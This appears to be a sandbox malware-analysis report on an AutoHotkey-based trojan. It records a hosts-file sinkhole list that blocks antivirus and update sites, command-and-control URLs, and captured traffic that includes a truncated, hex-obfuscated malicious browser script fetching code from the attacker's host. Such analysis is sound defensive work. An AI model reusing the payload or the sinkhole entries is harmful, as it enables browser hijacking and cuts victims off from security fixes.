2149ba923a655045b78e2a9be0b4f4b2 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll
8a3311f82d726423d7efa2fa00cb2acb c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll
22eb4f8a03c05c3575b61c955d7b19fd c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll
8c4817e470153861ccae6f32eb8f24e1 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll
38d0241cebb4ac26289e80f985d3ebef c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll
e71c012e0a370ae90ba295f7205b95e6 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll
632afa70f9720eb544854f2c553655c5 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\te.dll
0ca85c08971c7fca656b803e0fa6de0e c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\th.dll
96ad4ffef7c5791fa1f3bb3371ac3ef8 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll
e1d3ad461c48f57707529003209d00e5 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll
e45fb970e7c2fcb1ca91cfd59d2d8dae c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll
a3c8afd0b6974cea8502fec0027e591f c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll
feb7d00815cc26ee2b50386a08352e36 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll
a087867f590d53248897184ef3e5cfd4 c:\Program Files\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll
2c89a10a4ca6b9abbbe1ea3f61aed2ae c:\Program Files\Google\Chrome\Application\30.0.1573.2\chrome.dll
1362a0d7fb57614067035b6dee177989 c:\Program Files\Google\Chrome\Application\30.0.1573.2\icudt.dll
e6cb3fa160426172b0baa3d63c8f528a c:\Program Files\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll
c1227e1d33fd329a42295177be88e30b c:\Program Files\Google\Chrome\Application\chrome.exe

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps hostnames to IP addresses and is consulted before any DNS query is made.
The modified file is 15741 bytes in size. The following entries are added to it; each one points the named host at 127.0.0.1, so the listed security vendors, update services and analysis sites become unreachable from the infected machine:

127.0.0.1 tools.google.com
127.0.0.1 clients4.google.com
127.0.0.1 bitdefender.com
127.0.0.1 trendmicro.com
127.0.0.1 avg.com
127.0.0.1 clients4.google.com
127.0.0.1 grisoft.com
127.0.0.1 avg.cz
127.0.0.1 grisoft.cz
127.0.0.1 edgesuite.net
127.0.0.1 grisoft.com
127.0.0.1 avg.com
127.0.0.1 pctools.com
127.0.0.1 lavasoft.com
127.0.0.1 bitdefender.nl
127.0.0.1 virustotal.com
127.0.0.1 trendmicro.nl
127.0.0.1 trendmicro.com.au
127.0.0.1 securesoft.com.au
127.0.0.1 avira.com.au
127.0.0.1 gratissoftwaresite.nl
127.0.0.1 nod32.com.au
127.0.0.1 pandasecurity.com.au
127.0.0.1 lavasoft.com.au
127.0.0.1 avg.com.au
127.0.0.1 symantec-norton.com
127.0.0.1 trendmicro.com
127.0.0.1 malwarebytes.org
127.0.0.1 pchelpforum.com
127.0.0.1 cnet.com
127.0.0.1 techsupportforum.com
127.0.0.1 gratissoftware.nu
127.0.0.1 majorgeeks.com
127.0.0.1 pcworld.com
127.0.0.1 microbe.com.au
127.0.0.1 avast.com.au
127.0.0.1 avg-antivirus.com.au
127.0.0.1 nortonantiviruscenter.com
127.0.0.1 threatmetrix.com
127.0.0.1 zonealarm.com
127.0.0.1 firewallguide.com
127.0.0.1 auditmypc.com
127.0.0.1 comodo.com
127.0.0.1 free-firewall.org
127.0.0.1 schoonepc.nl
127.0.0.1 iopus.com
127.0.0.1 tucows.com
127.0.0.1 avg-antivirus-plus-firewall.en.softonic.com
127.0.0.1 softonic.com
127.0.0.1 superantispyware.com.au
127.0.0.1 superantispyware.com
127.0.0.1 harveynorman.com.au
127.0.0.1 ca-store.com.au
127.0.0.1 netfreighters.com.au
127.0.0.1 securetec.com.au
127.0.0.1 anti-spyware.com.au
127.0.0.1 virusscan.jotti.org
127.0.0.1 virscan.org
127.0.0.1 antivir.ru
127.0.0.1 avira.com
127.0.0.1 analysis.avira.com
127.0.0.1 hijackthis.de
127.0.0.1 uploadmalware.com
127.0.0.1 emsisoft.com
127.0.0.1 kaspersky.co.uk
127.0.0.1 bitdefender.co.uk
127.0.0.1 eset.co.uk
127.0.0.1 webroot.com
127.0.0.1 gdatasoftware.co.uk
127.0.0.1 pcpro.co.uk
127.0.0.1 webroot.co.uk
127.0.0.1 cyprotect.com
127.0.0.1 drweb-antivir.it
127.0.0.1 escanav.com
127.0.0.1 webroot.nl
127.0.0.1 av.eu
127.0.0.1 vergelijk.nl
127.0.0.1 antivirusvergelijk.nl
127.0.0.1 virussen.upc.nl
127.0.0.1 antivirus.startpagina.nl
127.0.0.1 avastav.nl
127.0.0.1 defenx.nl
127.0.0.1 gdata.nl
127.0.0.1 bitdefender.nl
127.0.0.1 removevirus.org
127.0.0.1 windows.microsoft.com
127.0.0.1 answers.microsoft.com
127.0.0.1 myantispyware.com
127.0.0.1 krebsonsecurity.com
127.0.0.1 antivirus.about.com
127.0.0.1 cleanuninstall.com
127.0.0.1 staples.com
127.0.0.1 esetindia.com
127.0.0.1 mcafee.free-trials.net
127.0.0.1 antivir-2012.com
127.0.0.1 panda-antivirus.en.softonic.com
127.0.0.1 freeantivirushelp.com
127.0.0.1 scanwith.com
127.0.0.1 bestantivirusreviewed.com
127.0.0.1 virus-help.net
127.0.0.1 cleanallspyware.com
127.0.0.1 kingsoftsecurity.com
127.0.0.1 threatfire.com
127.0.0.1 clamav.net
127.0.0.1 pcthreat.com
127.0.0.1 2-viruses.com
127.0.0.1 trojan-killer.ne
127.0.0.1 virusinfo.info
127.0.0.1 projecthoneypot.org
127.0.0.1 novirus.ru
127.0.0.1 anti-malware.com
127.0.0.1 offensivecomputing.net
127.0.0.1 zeustracker.abuse.ch
127.0.0.1 malekal.com
127.0.0.1 threatexpert.com
127.0.0.1 update.microsoft.com
127.0.0.1 av-comparatives.org
127.0.0.1 av-test.org
127.0.0.1 scanwith.com
127.0.0.1 trendmicro.com.au
127.0.0.1 kasperskyanz.com.au
127.0.0.1 bitdefender.com.au
127.0.0.1 eset.com.au
127.0.0.1 vet.com.au
127.0.0.1 mcafee.com
127.0.0.1 virusbtn.com
127.0.0.1 adwarereport.com
127.0.0.1 avg.com.au
127.0.0.1 adwarereport.com
127.0.0.1 dw.com
127.0.0.1 symantec.com
127.0.0.1 spywarewarrior.com
127.0.0.1 avsoft.ru
127.0.0.1 onecare.live.com
127.0.0.1 anubis.iseclab.org
127.0.0.1 wepawet.iseclab.org
127.0.0.1 iseclab.org
127.0.0.1 sunbelt-software.com
127.0.0.1 prevx.com
127.0.0.1 tuwien.ac.at
127.0.0.1 joebox.org
127.0.0.1 gmer.net
127.0.0.1 antirootkit.com
127.0.0.1 sectools.org
127.0.0.1 sandboxie.com
127.0.0.1 mwcollect.org
127.0.0.1 amtso.org
127.0.0.1 nsslabs.com
127.0.0.1 icsalabs.com
127.0.0.1 checkvir.com
127.0.0.1 check-mark.com
127.0.0.1 protectstar-testlab.org
127.0.0.1 anti-malware-test.com
127.0.0.1 av-test.de
127.0.0.1 wildlist.org
127.0.0.1 aavar.org
127.0.0.1 centralops.net
127.0.0.1 staysafeonline.info
127.0.0.1 rokop-security.de
127.0.0.1 rokop-security.de
127.0.0.1 wilderssecurity.com
127.0.0.1 superantispyware.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky.ru
127.0.0.1 avp.ru
127.0.0.1 viruslist.com
127.0.0.1 kaspersky-antivirus.ru
127.0.0.1 downloads.kaspersky-labs.com
127.0.0.1 kavdumps.kaspersky.com
127.0.0.1 kasperskyclub.ru
127.0.0.1 kasperskyclub.com
127.0.0.1 ftp.kasperskylab.ru
127.0.0.1 ftp.kaspersky-labs.com
127.0.0.1 ftp.kaspersky.ru
127.0.0.1 data.kaspersky.ru
127.0.0.1 z-oleg.com
127.0.0.1 drweb.com
127.0.0.1 freedrweb.com
127.0.0.1 drweb.com.ua
127.0.0.1 drweb.ru
127.0.0.1 av-desk.com
127.0.0.1 drweb.net
127.0.0.1 ftp.drweb.com
127.0.0.1 dr-web.ru
127.0.0.1 download.drweb.com
127.0.0.1 support.drweb.com
127.0.0.1 updates.sald.com
127.0.0.1 sald.com
127.0.0.1 drweb.imshop.de
127.0.0.1 norton.com
127.0.0.1 safeweb.norton.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 service1.symantec.com
127.0.0.1 security.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 sygate.com
127.0.0.1 esetnod32.ru
127.0.0.1 eset.com
127.0.0.1 nod32.com.ua
127.0.0.1 nod32.com
127.0.0.1 download.eset.com
127.0.0.1 update.eset.com
127.0.0.1 eset.eu
127.0.0.1 nod32.it
127.0.0.1 nod32.su
127.0.0.1 nod-32.ru
127.0.0.1 allnod.com
127.0.0.1 allnod.info
127.0.0.1 virusall.ru
127.0.0.1 nod32eset.org
127.0.0.1 eset.sk
127.0.0.1 nod32.nl
127.0.0.1 antivir.de
127.0.0.1 free-av.com
127.0.0.1 free-av.de
127.0.0.1 avira.com
127.0.0.1 forum.avira.com
127.0.0.1 avirus.ru
127.0.0.1 avirus.com.ua
127.0.0.1 mcafee.com
127.0.0.1 home.mcafee.com
127.0.0.1 us.mcafee.com
127.0.0.1 mcafeesecurity.com
127.0.0.1 mcafeesecure.com
127.0.0.1 avertlabs.com
127.0.0.1 download.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 eu.shopmcafee.com
127.0.0.1 shop.mcafee.com
127.0.0.1 mcafeestore.com
127.0.0.1 service.mcafee.com
127.0.0.1 siteadvisor.com
127.0.0.1 avast.ru
127.0.0.1 avast.com
127.0.0.1 onlinescan.avast.com
127.0.0.1 download1.avast.com
127.0.0.1 download1.avast.com
127.0.0.1 download2.avast.com
127.0.0.1 download2.avast.com
127.0.0.1 download3.avast.com
127.0.0.1 download4.avast.com
127.0.0.1 download5.avast.com
127.0.0.1 download7.avast.com
127.0.0.1 free.avg.com
127.0.0.1 au.norton.com
127.0.0.1 trustdefender.com
127.0.0.1 pctools.com
127.0.0.1 grisoft.cz
127.0.0.1 free.grisoft.com
127.0.0.1 bitdefender.com
127.0.0.1 msecn.net
127.0.0.1 bitdefender.de
127.0.0.1 bitdefender.com.ua
127.0.0.1 bitdefender.ru
127.0.0.1 myaccount.bitdefender.com
127.0.0.1 ftp.bitdefender.com
127.0.0.1 forum.bitdefender.com
127.0.0.1 agnitum.ru
127.0.0.1 agnitum.com
127.0.0.1 agnitum.de
127.0.0.1 outpostfirewall.com
127.0.0.1 dl2.agnitum.com
127.0.0.1 dl1.agnitum.com
127.0.0.1 antivirus.comodo.com
127.0.0.1 camas.comodo.com
127.0.0.1 comodo.com
127.0.0.1 comodogroup.com
127.0.0.1 personalfirewall.comodo.com
127.0.0.1 hackerguardian.com
127.0.0.1 nsclean.com
127.0.0.1 clamav.net
127.0.0.1 db.local.clamav.net
127.0.0.1 clamsupport.sourcefire.com
127.0.0.1 lurker.clamav.net
127.0.0.1 clamwin.com
127.0.0.1 gietl.com
127.0.0.1 clamav.dyndns.org
127.0.0.1 f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 support.f-secure.com
127.0.0.1 f-secure.ru
127.0.0.1 ftp.f-secure.com
127.0.0.1 europe.f-secure.com
127.0.0.1 f-secure.de
127.0.0.1 f-secure.de
127.0.0.1 support.f-secure.de
127.0.0.1 ftp.f-secure.de
127.0.0.1 f-secure.co.uk
127.0.0.1 norman.com
127.0.0.1 download.norman.no
127.0.0.1 sandbox.norman.no
127.0.0.1 nsclean.com
127.0.0.1 viruslab.ru
127.0.0.1 pandasoftware.com
127.0.0.1 anti-virus.by
127.0.0.1 virusblokada.ru
127.0.0.1 vba32.de
127.0.0.1 ftp.nai.com
127.0.0.1 secuser.com
127.0.0.1 tds.diamondcs.com.au
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 lavasoftusa.com
127.0.0.1 lavasoftusa.de
127.0.0.1 diamondcs.com.au
127.0.0.1 shop.ca.com
127.0.0.1 v4.windowsupdate.microsoft.com
127.0.0.1 v5.windowsupdate.microsoft.com
127.0.0.1 noadware.net
127.0.0.1 zonelabs.com
127.0.0.1 moosoft.com
127.0.0.1 model-fx.com
127.0.0.1 pccreg.antivirus.com
127.0.0.1 k-otik.com
127.0.0.1 vupen.com
127.0.0.1 housecall.trendmicro.com
127.0.0.1 antivirus.cai.com
127.0.0.1 sophos.com
127.0.0.1 securitoo.com
127.0.0.1 nordnet.com
127.0.0.1 avgfrance.com
127.0.0.1 avgfrance.com
127.0.0.1 antivirus-online.de
127.0.0.1 ftp.esafe.com
127.0.0.1 ftp.microworldsystems.com
127.0.0.1 ftp.ca.co
127.0.0.1 trendmicro-europe.com
127.0.0.1 inline-software.de
127.0.0.1 ravantivirus.com
127.0.0.1 ravantivirus.com
127.0.0.1 f-prot.com
127.0.0.1 files.f-prot.com
127.0.0.1 santivirus.com
127.0.0.1 openantivirus.org
127.0.0.1 dialognauka.ru
127.0.0.1 anti-virus-software-review.com
127.0.0.1 vet.com.au
127.0.0.1 antiviraldp.com
127.0.0.1 pestpatrol.com
127.0.0.1 antiviraldp.com
127.0.0.1 pestpatrol.com
127.0.0.1 simplysup.com
127.0.0.1 misec.net
127.0.0.1 my-etrust.com
127.0.0.1 authentium.com
127.0.0.1 finjan.com
127.0.0.1 ikarus-software.at
127.0.0.1 ika-rus.com
127.0.0.1 tinysoftware.com
127.0.0.1 visualizesoftware.com
127.0.0.1 kerio.com
127.0.0.1 zonelabs.com
127.0.0.1 zonelog.co.uk
127.0.0.1 webroot.com
127.0.0.1 lavasoft.nu
127.0.0.1 spywareguide.com
127.0.0.1 spyblocker-software.com
127.0.0.1 spamhaus.org
127.0.0.1 spamcop.net
127.0.0.1 bobbear.co.uk
127.0.0.1 domaintools.com
127.0.0.1 centralops.net
127.0.0.1 robtex.com
127.0.0.1 dnsstuff.com
127.0.0.1 ripe.net
127.0.0.1 met.police.uk
127.0.0.1 nbi.gov.ph
127.0.0.1 police.gov.hk
127.0.0.1 treasury.gov
127.0.0.1 treasury.gov
127.0.0.1 cybercrime.gov
127.0.0.1 cybercrime.ch
127.0.0.1 enisa.europa.eu
127.0.0.1 interpol.int
127.0.0.1 fsa.gov.uk
127.0.0.1 companies-house.gov.uk
127.0.0.1 fraudaid.com
127.0.0.1 scambusters.org
127.0.0.1 spamtrackers.eu
127.0.0.1 emlx.net
127.0.0.1 filmver.com
127.0.0.1 www.filmver.com
127.0.0.1 vatansana.com
127.0.0.1 www.vatansana.com
127.0.0.1 www.jscmd.net
127.0.0.1 jscmd.net
127.0.0.1 www.kingcdn.net
127.0.0.1 kingcdn.net
127.0.0.1 schedulesapps.com
127.0.0.1 www.schedulesapps.com
127.0.0.1 mustafacivan.com
127.0.0.1 www.mustafacivan.com
127.0.0.1 facebookdealers.org
127.0.0.1 www.facebookdealers.org
127.0.0.1 kingexe.com
127.0.0.1 www.kingexe.com
127.0.0.1 phppenguin.com
127.0.0.1 www.phppenguin.com
127.0.0.1 mobileshit.info
127.0.0.1 www.mobileshit.info
127.0.0.1 feidowns.com
127.0.0.1 www.feidowns.com
127.0.0.1 pestpatrol.com
127.0.0.1 videomobilhot.kim
127.0.0.1 www.videomobilhot.kim
127.0.0.1 xmobilevideo.mobi
127.0.0.1 www.xmobilevideo.mobi
127.0.0.1 tmobilevideo.mobi
127.0.0.1 www.tmobilevideo.mobi
127.0.0.1 onlinevideoxxx.com
127.0.0.1 www.onlinevideoxxx.com
127.0.0.1 clients1.google.com
127.0.0.1 clients2.google.com
127.0.0.1 clients3.google.com
127.0.0.1 clients4.google.com
127.0.0.1 clients5.google.com
127.0.0.1 clients6.google.com
127.0.0.1 clients7.google.com
127.0.0.1 clients8.google.com
127.0.0.1 clients9.google.com
127.0.0.1 clients10.google.com
127.0.0.1 www.dl.google.com
127.0.0.1 www.tools.google.com
127.0.0.1 clamav.dyndns.org
127.0.0.1 f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 support.f-secure.com
127.0.0.1 f-secure.ru
127.0.0.1 ftp.f-secure.com
127.0.0.1 europe.f-secure.com
127.0.0.1 f-secure.de
127.0.0.1 f-secure.de
127.0.0.1 support.f-secure.de
127.0.0.1 ftp.f-secure.de
127.0.0.1 f-secure.co.uk
127.0.0.1 norman.com
127.0.0.1 download.norman.no
127.0.0.1 sandbox.norman.no
127.0.0.1 nsclean.com
127.0.0.1 viruslab.ru
127.0.0.1 pandasoftware.com
127.0.0.1 anti-virus.by
127.0.0.1 virusblokada.ru
127.0.0.1 vba32.de
127.0.0.1 ftp.nai.com
127.0.0.1 secuser.com
127.0.0.1 tds.diamondcs.com.au
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 lavasoftusa.com
127.0.0.1 lavasoftusa.de
127.0.0.1 diamondcs.com.au
127.0.0.1 shop.ca.com
127.0.0.1 v4.windowsupdate.microsoft.com
127.0.0.1 v5.windowsupdate.microsoft.com
127.0.0.1 noadware.net
127.0.0.1 zonelabs.com
127.0.0.1 moosoft.com
127.0.0.1 model-fx.com
127.0.0.1 pccreg.antivirus.com
127.0.0.1 k-otik.com
127.0.0.1 vupen.com
127.0.0.1 housecall.trendmicro.com
127.0.0.1 antivirus.cai.com
127.0.0.1 sophos.com
127.0.0.1 securitoo.com
127.0.0.1 nordnet.com
127.0.0.1 avgfrance.com
127.0.0.1 avgfrance.com
127.0.0.1 antivirus-online.de
127.0.0.1 ftp.esafe.com
127.0.0.1 ftp.microworldsystems.com
127.0.0.1 ftp.ca.co
127.0.0.1 trendmicro-europe.com
127.0.0.1 inline-software.de
127.0.0.1 ravantivirus.com
127.0.0.1 ravantivirus.com
127.0.0.1 f-prot.com
127.0.0.1 files.f-prot.com
127.0.0.1 santivirus.com
127.0.0.1 openantivirus.org
127.0.0.1 dialognauka.ru
127.0.0.1 anti-virus-software-review.com
127.0.0.1 vet.com.au
127.0.0.1 antiviraldp.com
127.0.0.1 pestpatrol.com
127.0.0.1 antiviraldp.com
127.0.0.1 pestpatrol.com
127.0.0.1 simplysup.com
127.0.0.1 misec.net
127.0.0.1 my-etrust.com
127.0.0.1 authentium.com
127.0.0.1 finjan.com
127.0.0.1 ikarus-software.at
127.0.0.1 ika-rus.com
127.0.0.1 tinysoftware.com
127.0.0.1 visualizesoftware.com
127.0.0.1 kerio.com
127.0.0.1 zonelabs.com
127.0.0.1 zonelog.co.uk
127.0.0.1 webroot.com
127.0.0.1 lavasoft.nu
127.0.0.1 spywareguide.com
127.0.0.1 spyblocker-software.com
127.0.0.1 spamhaus.org
127.0.0.1 spamcop.net
127.0.0.1 bobbear.co.uk
127.0.0.1 domaintools.com
127.0.0.1 centralops.net
127.0.0.1 robtex.com
127.0.0.1 dnsstuff.com
127.0.0.1 ripe.net
127.0.0.1 met.police.uk
127.0.0.1 nbi.gov.ph
127.0.0.1 police.gov.hk
127.0.0.1 treasury.gov
127.0.0.1 treasury.gov
127.0.0.1 cybercrime.gov
127.0.0.1 cybercrime.ch
127.0.0.1 enisa.europa.eu
127.0.0.1 interpol.int
127.0.0.1 fsa.gov.uk
127.0.0.1 companies-house.gov.uk
127.0.0.1 fraudaid.com
127.0.0.1 scambusters.org
127.0.0.1 spamtrackers.eu
127.0.0.1 emlx.net
127.0.0.1 filmver.com
127.0.0.1 www.filmver.com
127.0.0.1 vatansana.com
127.0.0.1 www.vatansana.com
127.0.0.1 www.jscmd.net
127.0.0.1 jscmd.net
127.0.0.1 www.kingcdn.net
127.0.0.1 kingcdn.net
127.0.0.1 schedulesapps.com
127.0.0.1 www.schedulesapps.com
127.0.0.1 mustafacivan.com
127.0.0.1 www.mustafacivan.com
127.0.0.1 facebookdealers.org
127.0.0.1 www.facebookdealers.org
127.0.0.1 kingexe.com
127.0.0.1 www.kingexe.com
127.0.0.1 phppenguin.com
127.0.0.1 www.phppenguin.com
127.0.0.1 mobileshit.info
127.0.0.1 www.mobileshit.info
127.0.0.1 feidowns.com
127.0.0.1 www.feidowns.com
127.0.0.1 pestpatrol.com
127.0.0.1 videomobilhot.kim
127.0.0.1 www.videomobilhot.kim
127.0.0.1 xmobilevideo.mobi
127.0.0.1 www.xmobilevideo.mobi
127.0.0.1 tmobilevideo.mobi
127.0.0.1 www.tmobilevideo.mobi
127.0.0.1 onlinevideoxxx.com
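
A hosts file this size is easier to judge with a script than by eye, and the list above shows why: the same name appears several times, the names mix tab and space separation in the real file, and what matters is which categories of site have been cut off. The following Python is an added example, not code from the report or from the sample: it parses a hosts file the way the resolver reads it (comments stripped, any whitespace, several names per line), keeps the non-local names that point at loopback, reports duplicates, and buckets the names against a small suffix watchlist. The sample is a constructed excerpt, the stock Windows XP header plus a few of the entries above; the watchlist, its categories and the loopback set are the example's own.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed sample: the stock Windows XP hosts header plus a few of the
# entries listed above (the real modified file is 15741 bytes).
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
127.0.0.1 tools.google.com
127.0.0.1 clients4.google.com
127.0.0.1 virustotal.com
127.0.0.1 clients4.google.com
127.0.0.1 windowsupdate.microsoft.com   # inline comment
127.0.0.1\tupdate.eset.com
127.0.0.1 kaspersky.com
127.0.0.1 krebsonsecurity.com
"""

LOOPBACK = {'127.0.0.1', '0.0.0.0', '::1'}
# Names that legitimately resolve to loopback and must not be flagged.
LOCAL_NAMES = {'localhost', 'localhost.localdomain', 'broadcasthost'}

# Suffix watchlist (the example's own; extend as needed). Order matters:
# the first category whose suffix matches wins, so update hosts living
# under a vendor domain (update.eset.com) are classified as 'update'.
WATCHLIST = {
    'update': ('windowsupdate.microsoft.com', 'update.microsoft.com',
               'update.eset.com', 'tools.google.com', 'clients4.google.com'),
    'av-vendor': ('kaspersky.com', 'eset.com', 'symantec.com', 'mcafee.com',
                  'avast.com', 'bitdefender.com', 'avira.com', 'avg.com'),
    'analysis': ('virustotal.com', 'virscan.org', 'krebsonsecurity.com'),
}

def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (ip, hostname) pairs as the resolver sees them: comments stripped, any whitespace, many names per line."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            pairs.append((fields[0], name.lower()))
    return pairs

def classify(name: str) -> str:
    """First watchlist category whose suffix matches the name, else 'other'."""
    for label, suffixes in WATCHLIST.items():
        if any(name == s or name.endswith('.' + s) for s in suffixes):
            return label
    return 'other'

def sinkholed(text: str) -> Dict[str, object]:
    """Summarise every non-local name the file sends to loopback."""
    hits = [(ip, name) for ip, name in parse_hosts(text)
            if ip in LOOPBACK and name not in LOCAL_NAMES]
    counts = Counter(name for _, name in hits)
    by_category: Dict[str, List[str]] = defaultdict(list)
    for name in sorted(counts):
        by_category[classify(name)].append(name)
    return {
        'total_entries': len(hits),
        'unique_names': sorted(counts),
        'duplicates': sorted(n for n, c in counts.items() if c > 1),
        'by_category': dict(by_category),
    }

if __name__ == '__main__':
    summary = sinkholed(SAMPLE_HOSTS)
    print(f"{summary['total_entries']} loopback entries, "
          f"{len(summary['unique_names'])} unique, duplicates: {summary['duplicates']}")
    for label, names in summary['by_category'].items():
        print(f'{label}: {", ".join(names)}')
```

Run against the real file, the 'update' bucket is the one to read first: with windowsupdate.microsoft.com and the vendor update hosts sinkholed, neither Windows nor the installed antivirus can fetch fixes until the file is restored.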


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 165731 165888 4.65939 3abcaafbf6704002a8d67715ecbcfbb2
.rdata 172032 20515 20992 3.67193 9fa192174c9919add286b72b23b3765e
.data 196608 137468 5632 2.41253 095408555ae838fc66e40e7651304833
.rsrc 335872 146656 146944 4.12804 9b20d4aa4205c013cc42454cb762887e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://joojlee.com/ahk/ok.txt 104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=update_hash 104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=js 104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=key 104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=arsiv_hash 104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=arsiv_link 104.28.31.37
hxxp://a29.dscg10.akamai.net/app.exe
hxxp://joojlee.com:80/ahk/req.php?type=arsiv_link 104.28.31.37
hxxp://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80/app.exe 212.30.134.213
whos.amung.us 67.202.94.86
www.google.com 173.194.113.210


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (AutoHotkey)

Traffic

GET /ahk/ok.txt HTTP/1.1
User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 13 Feb 2015 13:22:12 GMT
Content-Type: text/plain
Content-Length: 9
Connection: keep-alive
Set-Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732; expires=Sat, 13-Feb-16 13:22:12 GMT; path=/; domain=.joojlee.com; HttpOnly
Accept-Ranges: bytes
ETag: "9-54c9c529-a81721174ce72eb7"
Last-Modified: Thu, 29 Jan 2015 05:29:13 GMT
Server: cloudflare-nginx
CF-RAY: 1b81555b83cc0c6b-AMS
Server_ok....



GET /ahk/req.php?type=update_hash HTTP/1.1

User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache
Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732


HTTP/1.1 200 OK
Date: Fri, 13 Feb 2015 13:22:12 GMT
Content-Type: text/javascript; Charset=UTF8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1b81555c73eb0c6b-AMS
0......



GET /ahk/req.php?type=js HTTP/1.1

User-Agent: AutoHotkey
Host: joojlee.com
Cache-Control: no-cache
Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732


HTTP/1.1 200 OK
Date: Fri, 13 Feb 2015 13:22:12 GMT
Content-Type: text/javascript; Charset=UTF8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: cloudflare-nginx
CF-RAY: 1b81555d34090c6b-AMS
cb8..var _0x7dc6=["\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x6
5\x6E\x73\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x72\x6C","
\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x
78\x74\x65\x6E\x73\x69\x6F\x6E","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\
x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x72\x65\x73\x65\x74\x50\x72\x6F\x6
6\x69\x6C\x65\x53\x65\x74\x74\x69\x6E\x67\x73","\x6F\x70\x65\x72\x61\x
3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F","\x62\x72\x6F\
x77\x73\x65\x72\x3A\x2F\x2F\x74\x75\x6E\x65\x2F","\x63\x68\x72\x6F\x6D
\x65\x3A\x2F\x2F\x68\x65\x6C\x70\x2F","\x69\x64","\x72\x65\x6D\x6F\x76
\x65","\x74\x61\x62\x73","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72
","\x6F\x6E\x55\x70\x64\x61\x74\x65\x64","\x6C\x65\x6E\x67\x74\x68","\
x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E","\x62\x6C\x6F\x63\x6B\x69\x6E
\x67","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74","
\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74","\x63\x73\x70","\x6F\x6E\x72
\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x6
5\x61\x64\x79\x53\x74\x61\x74\x65","\x75\x72\x69","\x70\x75\x73\x68","
\x66\x6F\x72\x45\x61\x63\x68","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x6
5\x78\x74","\x70\x61\x72\x73\x65","\x47\x45\x54","\x68\x74\x74\x70\x3A
\x2F\x2F\x6A\x6F\x6F\x6A\x6C\x65\x65\x2E\x63\x6F\x6D\x2F\x61\x68\x6B\x
2F\x67\x65\x74\x2E\x6A\x73\x3F\x63\x61\x63\x68\x65\x3D","\x72\x61\x6E\
x64\x6F\x6D","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x64\x65\x76\x74\x
6F\x6F\x6C\x73\x3A\x2F\x2F","\x65\x78\x65\x63\x75\x74\x65\x53\x63\

<<< skipped >>>
